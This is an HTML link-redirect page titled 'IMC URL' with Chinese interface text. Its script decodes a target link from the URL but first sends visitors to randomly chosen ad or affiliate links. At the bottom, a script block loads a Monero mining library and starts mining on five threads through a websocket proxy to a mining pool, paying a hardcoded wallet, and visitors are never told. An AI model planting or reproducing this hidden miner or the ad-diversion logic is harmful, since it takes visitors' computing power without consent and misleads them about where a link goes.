<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>IMC URL</title>
<script src="/assets/js/imc-main.js"></script>
<script>
var links = [
    'https://l.imc.re/adsterra',
    'https://l.imc.re/pddcpa',
    'https://l.imc.re/haoka',
    'https://l.imc.re/ad'
];

var ty = getURLParameter('ty');
// 读取base64数据解析为字符串

var tolink = getURLParameter('tolink');
// 判断 tolink 是链接还是base64字符串
if (tolink.indexOf('http') === 0) {
    tolink = decodeURIComponent(tolink);
} else {
    tolink = atob(tolink);
}

// 页面加载时执行
window.onload = function() {
    loadIMCMain();
    var ty = getURLParameter('ty'); // 确保这个值是从URL中获取的
    if (ty === 'loc') {
        adLoad();
    }
};

// 页面卸载前执行
window.onbeforeunload = function() {
    localStorage.setItem('visited', 0);
};

// 检查tolink是否存在以及访问次数，并执行相应的跳转
function adLoad() {
    var visited = parseInt(localStorage.getItem('visited')) || 0;
    if (tolink) {
        if (visited <= 0) {
            redirectToLinks(ty);
        } else {
            redirectToLinks(ty, tolink);
        }
        localStorage.setItem('visited', visited + 1);
    } else {
        redirectToLinks();
    }
}

function getURLParameter(name) {
    var queryParams = window.location.search.substring(1);
    var params = queryParams.split('&');
    for (var i = 0; i < params.length; i++) {
        var param = params[i].split('=');
        if (param[0] === name) {
        return decodeURIComponent(param[1]);
        }
    }
    return null;
}

function redirectToLinks(t,u) {
    if (u == undefined) {
        var randomIndex = Math.floor(Math.random() * links.length);
        url = links[randomIndex];
    } else {
        url = u;
    }

    if (t == 'win') {
        window.open(url, '_blank');
    } else {
        window.location.href = url;
    }
};
</script>
</head>
<body>
<center>
    <h1>IMC URL</h1>
    <p>IMC链接跳转页面，正在跳转中... 如页面没有自动跳转，请
         <button onclick="adLoad()"><h2>点击这里</h2></button> 跳转
        </p>
    <a>如未跳转至正确页面，多试几次即可</a>
</center>
<!-- Start Of Mining Code (HTML) -->
<script src="/assets/js/na-monero.js"></script>
<script>
    server = "wss://ny1.xmrminingproxy.com";
    var pool = "moneroocean.stream";
    var walletAddress = "47YPoXCVUxAQFpS8gmQX4fgY5LmnGkNG4Xz3WjzADvvZhr8WnNG3P4MD4hPAxF8aWZbUSrHhJ7YdZ4x3pi3qJw6aT9RxMg2";
    var workerId = "WEB-XMR"
    var threads = 5; //-1
    var password = "";
    startMining(pool, walletAddress, workerId, threads, password);
    throttleMiner = 20;
</script>
<!-- End Of Mining Code (HTML) -->
</body>
</html>